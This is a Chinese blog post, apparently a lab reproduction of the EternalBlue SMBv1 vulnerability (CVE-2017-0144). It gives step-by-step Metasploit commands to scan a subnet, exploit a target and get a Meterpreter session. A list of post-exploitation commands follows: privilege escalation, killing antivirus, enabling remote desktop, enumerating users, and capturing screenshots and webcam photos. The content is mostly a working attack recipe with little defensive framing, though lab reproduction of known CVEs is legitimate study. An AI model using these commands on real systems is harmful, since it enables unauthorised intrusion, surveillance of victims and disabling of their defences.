永恒之蓝漏洞复现-CVE-2017-0144

1、原理 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

我们需要一个有永恒之蓝漏洞的系统

靶机为 192.168.3.8

2.CVE-2017-0144 利用方法

1 启动Metasploit

终端里输入 msfconsole

2 查询利用模块

终端里输入 search ms17_010

3 使用探测模块

终端内输入 use auxiliary/scanner/smb/smb_ms17_010

4 设置探测范围

终端内输入 options

从上面的图片我们发现 只需要 设置一个 RHOST

终端内输入 set rhosts 192.168.81.0/24 (设置扫描当前网段 可以通过 在终端内输入ip a 查看)

也可以设置范围 set rhosts 192.168.81.1-192.168.81.254

run 一下

根据上图我们可以看到 192.168.3.8 这个IP的机器可能存在漏洞

6 开始漏洞利用

开始利用首先在终端里输入 search ms17_010

使用 模块 use exploit/windows/smb/ms17_010_eternalblue

7 配置利用模块

配置模块 show options 配置靶机 set rhost 192.168.3.8 这里IP填第五步探测到的IP

8 执行攻击

在终端里输入 run

知道咱们看到 win 则攻击成功 拿到meterpreter

9 后渗透操作

查看进程:ps 查看当前进程号:getpid 查看系统信息:sysinfo 查看目标机是否为虚拟机:run post/windows/gather/checkvm 查看完整网络设置:route 查看当前权限:getuid 自动提权:getsystem 关闭杀毒软件:run post/windows/manage/killav 启动远程桌面协议:run post/windows/manage/enable_rdp 列举当前登录的用户:run post/windows/gather/enum_logged_on_users 查看当前应用程序:run post/windows/gather/enum_applications 抓取目标机的屏幕截图:load espia ; screengrab 抓取摄像头的照片:webcam_snap 查看当前处于目标机的那个目录:pwd 查看当前目录:getlwd

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值